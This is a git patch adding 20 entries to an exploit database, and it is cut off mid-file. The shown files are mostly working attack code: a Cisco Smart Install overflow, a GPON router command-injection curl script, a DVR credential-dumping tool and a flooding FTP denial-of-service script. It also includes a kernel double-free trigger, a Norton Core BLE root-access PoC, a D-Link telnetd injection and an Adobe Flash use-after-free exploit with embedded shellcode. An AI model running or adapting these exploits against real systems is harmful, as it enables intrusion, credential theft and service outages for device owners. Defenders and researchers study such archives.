From 813a3efbb53bbb4515ea650b80161546affbc785 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 4 May 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-05-04 20 changes to exploits/shellcodes Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow Jnes 1.0.2 - Stack Buffer Overflow Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow netek 0.8.2 - Denial of Service Cisco Smart Install - Crash (PoC) Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1) Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) Adobe Reader PDF - Client Side Request Injection Windows - Local Privilege Escalation Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit) Adobe Flash < 28.0.0.161 - Use-After-Free Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC) GPON Routers - Authentication Bypass / Command Injection TBK DVR4104 / DVR4216 - Credentials Leak Call of Duty Modern Warefare 2 - Buffer Overflow Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion Squirrelcart 1.x - 'cart.php' Remote File Inclusion Infinity 2.x.x - options[style_dir] Local File Disclosure Infinity 2.x - 'options[style_dir]' Local File Disclosure PHP-Nuke 8.x.x - Blind SQL Injection PHP-Nuke 8.x - Blind SQL Injection WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities Ajax Availability Calendar 3.x - Multiple Vulnerabilities vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting Subrion 3.X.x - Multiple Vulnerabilities Subrion 3.x - Multiple Vulnerabilities Ciuis CRM 1.0.7 - SQL Injection LifeSize ClearSea 3.1.4 - Directory Traversal WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting DLINK DCS-5020L - Remote Code Execution (PoC) Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection --- exploits/hardware/dos/44451.py | 41 ++++ exploits/hardware/remote/44574.txt | 35 +++ exploits/hardware/remote/44576.sh | 9 + exploits/hardware/remote/44577.py | 120 ++++++++++ exploits/hardware/webapps/44580.txt | 11 + exploits/linux/dos/44190.py | 26 ++ exploits/linux/dos/44579.c | 52 ++++ exploits/linux/local/25444.c | 3 + exploits/multiple/remote/44412.py | 84 +++++++ exploits/multiple/webapps/44583.txt | 164 +++++++++++++ exploits/php/webapps/43347.txt | 48 ++++ exploits/php/webapps/44409.txt | 45 ++++ exploits/windows/dos/43116.py | 41 ++++ exploits/windows/dos/43208.py | 77 ++++++ exploits/windows/dos/44273.py | 56 +++++ exploits/windows/dos/44572.txt | 15 ++ exploits/windows/local/44573.txt | 48 ++++ exploits/windows/local/44581.c | 353 ++++++++++++++++++++++++++++ exploits/windows/remote/44582.txt | 11 + exploits/windows/webapps/44390.py | 72 ++++++ files_exploits.csv | 41 +++- 21 files changed, 1341 insertions(+), 11 deletions(-) create mode 100755 exploits/hardware/dos/44451.py create mode 100644 exploits/hardware/remote/44574.txt create mode 100755 exploits/hardware/remote/44576.sh create mode 100755 exploits/hardware/remote/44577.py create mode 100644 exploits/hardware/webapps/44580.txt create mode 100755 exploits/linux/dos/44190.py create mode 100644 exploits/linux/dos/44579.c create mode 100755 exploits/multiple/remote/44412.py create mode 100644 exploits/multiple/webapps/44583.txt create mode 100644 exploits/php/webapps/43347.txt create mode 100644 exploits/php/webapps/44409.txt create mode 100755 exploits/windows/dos/43116.py create mode 100755 exploits/windows/dos/43208.py create mode 100755 exploits/windows/dos/44273.py create mode 100644 exploits/windows/dos/44572.txt create mode 100644 exploits/windows/local/44573.txt create mode 100644 exploits/windows/local/44581.c create mode 100644 exploits/windows/remote/44582.txt create mode 100755 exploits/windows/webapps/44390.py diff --git a/exploits/hardware/dos/44451.py b/exploits/hardware/dos/44451.py new file mode 100755 index 000000000..c0f6f15e5 --- /dev/null +++ b/exploits/hardware/dos/44451.py @@ -0,0 +1,41 @@ +# smi_ibc_init_discovery_BoF.py + +import socket +import struct +from optparse import OptionParser + +# Parse the target options +parser = OptionParser() +parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args() + +def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'): + return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v + +def send_packet(sock, packet): + sock.send(packet) + +def receive(sock): + return sock.recv() + +if __name__ == "__main__": + + print "[*] Connecting to Smart Install Client ", options.target, "port", options.port + + con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + con.connect((options.target, options.port)) + + payload = 'BBBB' * 44 shellcode = 'D' * 2048 + + data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload + + tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode + + hdr = '\x00\x00\x00\x01' # msg_from + hdr += '\x00\x00\x00\x01' # version + hdr += '\x00\x00\x00\x07' # msg_hdr_type + hdr += struct.pack('>I', len(data)) # data_length + + pkt = hdr + tlv_1 + tlv_2 + + print "[*] Send a malicious packet" + send_packet(con, pkt) \ No newline at end of file diff --git a/exploits/hardware/remote/44574.txt b/exploits/hardware/remote/44574.txt new file mode 100644 index 000000000..983e53332 --- /dev/null +++ b/exploits/hardware/remote/44574.txt @@ -0,0 +1,35 @@ +# PoC command injection in BLE service of Norton Core Secure WiFi Router (CVE-2018-5234) + +For more information read +[paper](https://embedi.com/blog/whos-watching-the-watchers-vol-ii-norton-core-secure-wifi-router). + +To demonstrate the exploitation, we will use: +- OS GNU/Linux; +- Bluetooth dongle adapter; +- BlueZ utility (for testing Bluetooth connection). + +In order to use the script, we will need to set all dependencies in a advance: + +```shell +$ pip install -r ./requirements.txt +``` + +With the help of `BlueZ` utilities, we should ensure Bluetooth is enabled and +functions properly. + +1. Restart the router to provide access to the engineering page. +2. Start the PoC on behalf of the root user (required for operating with + Bluetooth) with the command on executing as an argument: + + ```shell + $ ./ble_norton_core.py "/etc/init.d/dropbear start" + ``` + + After the script is successfully executed, we get access to the device via + the SSH connection. We put `root` as a user and `admin` as password: + + ```shell + $ ssh root@norton.core + ``` + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44574.zip \ No newline at end of file diff --git a/exploits/hardware/remote/44576.sh b/exploits/hardware/remote/44576.sh new file mode 100755 index 000000000..24e886b66 --- /dev/null +++ b/exploits/hardware/remote/44576.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +echo "[+] Sending the Command… " +# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices +curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null +echo "[+] Waiting…." +sleep 3 +echo "[+] Retrieving the ouput…." +curl -k $1/diag.html?images/ 2>/dev/null | grep ‘diag_result = ‘ | sed -e ‘s/\\n/\n/g’ \ No newline at end of file diff --git a/exploits/hardware/remote/44577.py b/exploits/hardware/remote/44577.py new file mode 100755 index 000000000..151f019b5 --- /dev/null +++ b/exploits/hardware/remote/44577.py @@ -0,0 +1,120 @@ +# -*- coding: utf-8 -*- +import json +import requests +import argparse +import tableprint as tp + +class Colors: + BLUE = '\033[94m' + GREEN = '\033[32m' + RED = '\033[0;31m' + DEFAULT = '\033[0m' + ORANGE = '\033[33m' + WHITE = '\033[97m' + BOLD = '\033[1m' + BR_COLOUR = '\033[1;37;40m' + +banner = ''' + __..--.._ + ..... .--~ ..... `. + .": "`-.. . .' ..-'" :". ` + ` `._ ` _.'`"( `-"'`._ ' _.' ' + ~~~ `. ~~~ + .' + / + ( + ^---' + + + [*] @capitan_alfa +''' + +details = ''' + # Exploit Title: DVRs; Credentials Exposed + # Date: 09/04/2018 + # Exploit Author: Fernandez Ezequiel ( @capitan_alfa ) +''' +parser = argparse.ArgumentParser(prog='getDVR_Credentials.py', + description=' [+] Obtaining Exposed credentials', + epilog='[+] Demo: python getDVR_Credentials.py --host 192.168.1.101 -p 81', + version="1.1") + +parser.add_argument('--host', dest="HOST", help='Host', required=True) +parser.add_argument('--port', dest="PORT", help='Port', default=80) + +args = parser.parse_args() + +HST = args.HOST +port = args.PORT + +headers = {} + +fullHost_1 = "http://"+HST+":"+str(port)+"/device.rsp?opt=user&cmd=list" +host = "http://"+HST+":"+str(port)+"/" + +print Colors.GREEN+banner+Colors.DEFAULT + + +def makeReqHeaders(xCookie): + headers["Host"] = host + headers["User-Agent"] = "Morzilla/7.0 (911; Pinux x86_128; rv:9743.0)" + headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + headers["Accept-Languag"] = "es-AR,en-US;q=0.7,en;q=0.3" + headers["Connection"] = "close" + headers["Content-Type"] = "text/html" + headers["Cookie"] = "uid="+xCookie + + return headers + +try: + rX = requests.get(fullHost_1,headers=makeReqHeaders(xCookie="admin"),timeout=10.000) +except Exception,e: + print Colors.RED+" [+] Timed out\n"+Colors.DEFAULT + exit() + +badJson = rX.text +try: + dataJson = json.loads(badJson) + totUsr = len(dataJson["list"]) #--> 10 +except Exception, e: + print " [+] Error: "+str(e) + print " [>] json: "+str(rX) +# print " [>] Reuest: \n"+str(makeReqHeaders(xCookie="admin")) + exit() + + +print Colors.GREEN+"\n [+] DVR (url):\t\t"+Colors.ORANGE+str(host)+Colors.GREEN +print " [+] Port: \t\t"+Colors.ORANGE+str(port)+Colors.DEFAULT + +print Colors.GREEN+"\n [+] Users List:\t"+Colors.ORANGE+str(totUsr)+Colors.DEFAULT +print " " + +final_data = [] +try: + for obj in range(0,totUsr): + + temp = [] + + _usuario = dataJson["list"][obj]["uid"] + _password = dataJson["list"][obj]["pwd"] + _role = dataJson["list"][obj]["role"] + + temp.append(_usuario) + temp.append(_password) + temp.append(_role) + + final_data.append(temp) + + hdUsr = Colors.GREEN + "Username" + Colors.DEFAULT + hdPass = Colors.GREEN + "Password" + Colors.DEFAULT + hdRole = Colors.GREEN + "Role ID" + Colors.DEFAULT + + cabeceras = [hdUsr, hdPass, hdRole] + + tp.table(final_data, cabeceras, width=20) + +except Exception, e: + print "\n [!]: "+str(e) + print " [+] "+ str(dataJson) + +print "\n" \ No newline at end of file diff --git a/exploits/hardware/webapps/44580.txt b/exploits/hardware/webapps/44580.txt new file mode 100644 index 000000000..a23181f1f --- /dev/null +++ b/exploits/hardware/webapps/44580.txt @@ -0,0 +1,11 @@ +“The DCS-5020L Wireless N Day & Night Pan/Tilt Cloud Camera is a day/night network camera that easily connects to your existing home network for remote viewing on a range of mobile devices. It features pan, tilt and digital zoom function to allow you to see a wider area with a single camera, built-in Wi-Fi extender to effortlessly expand your wireless coverage, night vision up to 5 metres, sound and motion detection for the ultimate in peace of mind, and H.264 video compression for a high-quality image.” + +This walkthrough demonstrates just how easy it can be to find vulnerabilities in Internet of Things (IOT) devices. The process of finding the following command injection can be broken down into 3 steps that are more akin to a 100 point CTF challenge: download binary, run strings, trace input to system call to origin. + + + + + +An attacker can escape the ‘sed’ command with a simple payload, such as ‘`touch a`’. Another example that fits is AdminID=a’`telnetd`’, which allows a user to login as “a”, which becomes the new root account: + +Source: https://www.fidusinfosec.com/dlink-dcs-5030l-remote-code-execution-cve-2017-17020/ \ No newline at end of file diff --git a/exploits/linux/dos/44190.py b/exploits/linux/dos/44190.py new file mode 100755 index 000000000..00005c066 --- /dev/null +++ b/exploits/linux/dos/44190.py @@ -0,0 +1,26 @@ +#Exploit Title : netek 0.8.2 FTP Denial of Service +#Test on : windowsXPs3 + windows 7 +#software Link :https://sourceforge.net/projects/netek.berlios/ +#version : 0.8.2 +#author : Lawrence Amer +#site : lawrenceamer.me +#affected product uses default port 30817 , it can be chnaged also +#!/bin/python +import socket + + +ip = raw_input("[+] IP to attack: ") + +sarr = [] +i = 0 +while True: + try: + sarr.append(socket.create_connection((ip,30817))) + print "[+] Connection %d" % i + crash1 = "\x41"*5000 +"\X42"*1000 + sarr[i].send(crash1+'\r\n') + i+=1 + except socket.error: + print "[*] Server crashed with CPU 100!!" + raw_input() + break \ No newline at end of file diff --git a/exploits/linux/dos/44579.c b/exploits/linux/dos/44579.c new file mode 100644 index 000000000..e203d80e7 --- /dev/null +++ b/exploits/linux/dos/44579.c @@ -0,0 +1,52 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct sockaddr_llc { + short sllc_family; + short sllc_arphrd; + unsigned char sllc_test; + unsigned char sllc_xid; + unsigned char sllc_ua; + unsigned char sllc_sap; + unsigned char sllc_mac[6]; + unsigned char __pad[2]; +}; + +void test() +{ + int fd = socket(AF_LLC, SOCK_STREAM, 0); + char output[32] = "lo"; + socklen_t len; + setsockopt(fd, SOL_SOCKET, SO_BINDTODEVICE, &output, 0x10); + struct sockaddr_llc addr1 = {.sllc_family = AF_LLC, .sllc_sap = 2}; + bind(fd, (const struct sockaddr *)&addr1, sizeof(struct sockaddr_llc)); + struct sockaddr_llc addr2 = {.sllc_family = AF_LLC, .sllc_sap = 2}; + connect(fd, (const struct sockaddr *)&addr2, sizeof(struct sockaddr_llc)); + + char msg[0x10] = "aaaa"; + send(fd, msg, 0x10, 0); +} + +int main() +{ + test(); + return 0; +} \ No newline at end of file diff --git a/exploits/linux/local/25444.c b/exploits/linux/local/25444.c index 0ab2e5202..b75911d2a 100644 --- a/exploits/linux/local/25444.c +++ b/exploits/linux/local/25444.c @@ -6,6 +6,9 @@ * update may 2013: * seems like centos 2.6.32 backported the perf bug, lol. * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. + * + * EDB Note: Update ~ http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/ + * ~ https://github.com/realtalk/cve-2013-2094/blob/master/rewritten_semtex.c */ #define _GNU_SOURCE 1 diff --git a/exploits/multiple/remote/44412.py b/exploits/multiple/remote/44412.py new file mode 100755 index 000000000..31233c415 --- /dev/null +++ b/exploits/multiple/remote/44412.py @@ -0,0 +1,84 @@ +#!/usr/bin/env python +# coding: UTF-8 +import BaseHTTPServer +import sys +from SimpleHTTPServer import SimpleHTTPRequestHandler + +print "@Syfi2k" +print "[+] CVE-2018-4878 poc " +print "--------------------------------" +print "Calc.exe Shellcode via Msfvenom" +print "Based on fixed version https://github.com/anbai-inc/CVE-2018-4878" +print "No Crash without executing the Shellcode, Sandbox? try it yourself" + + +buf = "" +buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" +buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00" +buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" +buf += "\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a" +buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +buf += "\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" + +payload = buf +data = "" +flash_name = "movie" + + + +data = "\x46\x57\x53\x20\xE3\x45\x00\x00\x78\x00\x04\xE2\x00\x00\x0E\xA6\x00\x00\x18\x01\x00\x44\x11\x19\x00\x00\x00\x7F\x13\x1F\x02\x00\x00\x3C\x72\x64\x66\x3A\x52\x44\x46\x20\x78\x6D\x6C\x6E\x73\x3A\x72\x64\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x31\x39\x39\x39\x2F\x30\x32\x2F\x32\x32\x2D\x72\x64\x66\x2D\x73\x79\x6E\x74\x61\x78\x2D\x6E\x73\x23\x22\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x72\x64\x66\x3A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x20\x78\x6D\x6C\x6E\x73\x3A\x64\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x70\x75\x72\x6C\x2E\x6F\x72\x67\x2F\x64\x63\x2F\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2F\x31\x2E\x31\x22\x20\x72\x64\x66\x3A\x61\x62\x6F\x75\x74\x3D\x22\x22\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x66\x6F\x72\x6D\x61\x74\x3E\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x73\x68\x6F\x63\x6B\x77\x61\x76\x65\x2D\x66\x6C\x61\x73\x68\x3C\x2F\x64\x63\x3A\x66\x6F\x72\x6D\x61\x74\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x74\x69\x74\x6C\x65\x3E\x41\x64\x6F\x62\x65\x20\x46\x6C\x65\x78\x20\x34\x20\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x3C\x2F\x64\x63\x3A\x74\x69\x74\x6C\x65\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x70\x72\x6F\x64\x75\x63\x74\x73\x2F\x66\x6C\x65\x78\x3C\x2F\x64\x63\x3A\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x70\x75\x62\x6C\x69\x73\x68\x65\x72\x3E\x75\x6E\x6B\x6E\x6F\x77\x6E\x3C\x2F\x64\x63\x3A\x70\x75\x62\x6C\x69\x73\x68\x65\x72\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x63\x72\x65\x61\x74\x6F\x72\x3E\x75\x6E\x6B\x6E\x6F\x77\x6E\x3C\x2F\x64\x63\x3A\x63\x72\x65\x61\x74\x6F\x72\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x6C\x61\x6E\x67\x75\x61\x67\x65\x3E\x45\x4E\x3C\x2F\x64\x63\x3A\x6C\x61\x6E\x67\x75\x61\x67\x65\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x63\x3A\x64\x61\x74\x65\x3E\x46\x65\x62\x20\x36\x2C\x20\x32\x30\x31\x38\x3C\x2F\x64\x63\x3A\x64\x61\x74\x65\x3E\x0D\x0A\x20\x20\x20\x20\x3C\x2F\x72\x64\x66\x3A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x20\x3C\x2F\x72\x64\x66\x3A\x52\x44\x46\x3E\x0D\x0A\x00\xD0\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x10\xE8\x03\x3C\x00\x43\x02\xFF\xFF\xFF\xC8\x0A\x66\x6C\x61\x73\x68\x30\x32\x00\xFF\x15\x82\x0B\x00\x00\x02\x00\x00\x00\x00\x00" + + +filler = 2940 - len(payload) + +data = data + payload + "\x90" * filler + + +data = data + "\x13\x0E\x01\x00\x02\x00\x73\x68\x65\x6C\x6C\x63\x6F\x64\x42\x79\x74\x65\x73\x00\x00\xBF\x14\xB6\x06\x00\x00\x01\x00\x00\x00\x4D\x61\x69\x6E\x45\x78\x70\x00\x10\x00\x2E\x00\x02\x00\x28\x8E\xCD\xBD\x06\xAD\xCA\x75\x8F\xCD\xBD\x06\xAE\xE4\xE0\x03\x8E\xCD\xBD\x06\xFC\xE2\x75\x8E\xCD\xBD\x06\xFE\xF0\x75\x8E\xCD\xBD\x06\xF8\xF8\x75\x8F\xCD\xBD\x06\xF9\xFE\xA1\x03\x8E\xCD\xBD\x06\xF8\xDE\x75\x89\xCD\xBD\x06\xDC\xB6\xCD\x02\xD6\xF6\x68\x8F\xCD\xBD\x06\xFA\xE6\xCD\x03\x8F\xCD\xBD\x06\xF5\xDC\xA1\x03\x8E\xCD\xBD\x06\xF1\xDC\x74\x8F\xCD\xBD\x06\xD1\xBA\xFD\x02\x8F\xCD\xBD\x06\xEC\xDC\xCD\x03\x8E\xCD\xBD\x06\xEF\xE4\x75\x8E\xCD\xBD\x06\xEE\xF8\x75\x8E\xCD\xBD\x06\xE9\xF0\x75\x89\xCD\xBD\x06\xEE\xE6\xDD\x03\xFF\xD0\x69\x8F\xCD\xBD\x06\xCB\xAA\xC9\x02\x93\xCD\xBD\x06\x00\x55\x07\x4D\x61\x69\x6E\x45\x78\x70\x05\x76\x61\x72\x5F\x31\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x76\x61\x72\x5F\x32\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x06\x64\x61\x74\x61\x31\x34\x06\x64\x61\x74\x61\x31\x35\x3C\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x4D\x69\x68\x61\x5C\x41\x64\x6F\x62\x65\x4D\x69\x6E\x65\x50\x6F\x43\x5F\x74\x72\x79\x69\x6E\x67\x54\x6F\x45\x76\x61\x64\x65\x53\x65\x63\x53\x6F\x6C\x75\x74\x69\x6F\x6E\x73\x66\x6C\x61\x30\x31\x2E\x61\x73\x05\x64\x61\x74\x61\x32\x05\x64\x61\x74\x61\x33\x09\x42\x79\x74\x65\x41\x72\x72\x61\x79\x0B\x66\x6C\x61\x73\x68\x2E\x75\x74\x69\x6C\x73\x06\x45\x6E\x64\x69\x61\x6E\x0D\x4C\x49\x54\x54\x4C\x45\x5F\x45\x4E\x44\x49\x41\x4E\x06\x65\x6E\x64\x69\x61\x6E\x0C\x43\x61\x70\x61\x62\x69\x6C\x69\x74\x69\x65\x73\x0C\x66\x6C\x61\x73\x68\x2E\x73\x79\x73\x74\x65\x6D\x07\x76\x65\x72\x73\x69\x6F\x6E\x01\x2C\x01\x20\x07\x72\x65\x70\x6C\x61\x63\x65\x21\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x41\x53\x33\x2F\x32\x30\x30\x36\x2F\x62\x75\x69\x6C\x74\x69\x6E\x05\x73\x70\x6C\x69\x74\x05\x41\x72\x72\x61\x79\x0C\x4D\x61\x69\x6E\x45\x78\x70\x2E\x61\x73\x24\x30\x14\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x53\x70\x72\x69\x74\x65\x24\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x44\x69\x73\x70\x6C\x61\x79\x4F\x62\x6A\x65\x63\x74\x43\x6F\x6E\x74\x61\x69\x6E\x65\x72\x1F\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x49\x6E\x74\x65\x72\x61\x63\x74\x69\x76\x65\x4F\x62\x6A\x65\x63\x74\x1B\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x3A\x44\x69\x73\x70\x6C\x61\x79\x4F\x62\x6A\x65\x63\x74\x1C\x66\x6C\x61\x73\x68\x2E\x65\x76\x65\x6E\x74\x73\x3A\x45\x76\x65\x6E\x74\x44\x69\x73\x70\x61\x74\x63\x68\x65\x72\x00\x06\x4E\x75\x6D\x62\x65\x72\x07\x63\x6C\x61\x73\x73\x5F\x31\x05\x76\x61\x72\x5F\x33\x0F\x4D\x61\x69\x6E\x45\x78\x70\x2F\x4D\x61\x69\x6E\x45\x78\x70\x0A\x69\x73\x44\x65\x62\x75\x67\x67\x65\x72\x05\x76\x61\x72\x5F\x34\x07\x66\x6C\x61\x73\x68\x31\x30\x05\x76\x61\x72\x5F\x35\x0F\x4D\x61\x69\x6E\x45\x78\x70\x2F\x66\x6C\x61\x73\x68\x32\x31\x04\x76\x6F\x69\x64\x05\x43\x6C\x61\x73\x73\x17\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x70\x6F\x73\x03\x33\x36\x34\x03\x34\x36\x33\x03\x34\x39\x38\x03\x35\x33\x37\x03\x31\x39\x39\x03\x32\x32\x39\x03\x69\x6E\x74\x03\x32\x36\x30\x07\x66\x6C\x61\x73\x68\x32\x31\x04\x31\x32\x37\x30\x0D\x66\x6C\x61\x73\x68\x2E\x64\x69\x73\x70\x6C\x61\x79\x06\x53\x70\x72\x69\x74\x65\x06\x4F\x62\x6A\x65\x63\x74\x0F\x45\x76\x65\x6E\x74\x44\x69\x73\x70\x61\x74\x63\x68\x65\x72\x0C\x66\x6C\x61\x73\x68\x2E\x65\x76\x65\x6E\x74\x73\x0D\x44\x69\x73\x70\x6C\x61\x79\x4F\x62\x6A\x65\x63\x74\x11\x49\x6E\x74\x65\x72\x61\x63\x74\x69\x76\x65\x4F\x62\x6A\x65\x63\x74\x16\x44\x69\x73\x70\x6C\x61\x79\x4F\x62\x6A\x65\x63\x74\x43\x6F\x6E\x74\x61\x69\x6E\x65\x72\x1C\x5F\x5F\x67\x6F\x5F\x74\x6F\x5F\x63\x74\x6F\x72\x5F\x64\x65\x66\x69\x6E\x69\x74\x69\x6F\x6E\x5F\x68\x65\x6C\x70\x03\x35\x37\x38\x03\x31\x35\x37\x05\x41\x72\x72\x61\x79\x0B\x66\x6C\x61\x73\x68\x2E\x75\x74\x69\x6C\x73\x09\x42\x79\x74\x65\x41\x72\x72\x61\x79\x21\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x41\x53\x33\x2F\x32\x30\x30\x36\x2F\x62\x75\x69\x6C\x74\x69\x6E\x09\x77\x72\x69\x74\x65\x42\x79\x74\x65\x08\x74\x6F\x53\x74\x72\x69\x6E\x67\x00\x06\x4F\x62\x6A\x65\x63\x74\x06\x53\x74\x72\x69\x6E\x67\x03\x69\x6E\x74\x04\x06\x07\x06\x07\x06\x6E\x61\x6D\x65\x5F\x32\x06\x6E\x61\x6D\x65\x5F\x31\x0D\x73\x68\x65\x6C\x6C\x63\x6F\x64\x42\x79\x74\x65\x73\x08\x3A\x4D\x61\x69\x6E\x45\x78\x70\x0C\x55\x41\x46\x47\x65\x6E\x65\x72\x61\x74\x6F\x72\x0F\x4D\x61\x69\x6E\x45\x78\x70\x3A\x66\x6C\x61\x73\x68\x32\x31\x10\x3A\x4D\x61\x69\x6E\x45\x78\x70\x2F\x4D\x61\x69\x6E\x45\x78\x70\x3E\x05\x01\x16\x03\x16\x0D\x16\x12\x08\x17\x05\x1A\x17\x03\x18\x01\x1A\x01\x1A\x1B\x1A\x1C\x1A\x1D\x1A\x1E\x1A\x1F\x16\x38\x16\x3C\x17\x4D\x16\x49\x16\x44\x16\x49\x16\x49\x16\x49\x08\x46\x17\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x05\x51\x18\x51\x1A\x51\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x16\x49\x06\x0C\x01\x02\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x01\x02\x03\x11\x12\x13\x0C\x01\x12\x17\x06\x18\x08\x09\x0A\x0B\x0C\x0D\x0E\x0C\x12\x17\x18\x0A\x0B\x0C\x0D\x0E\x35\x36\x37\x06\x48\x07\x02\x02\x07\x02\x0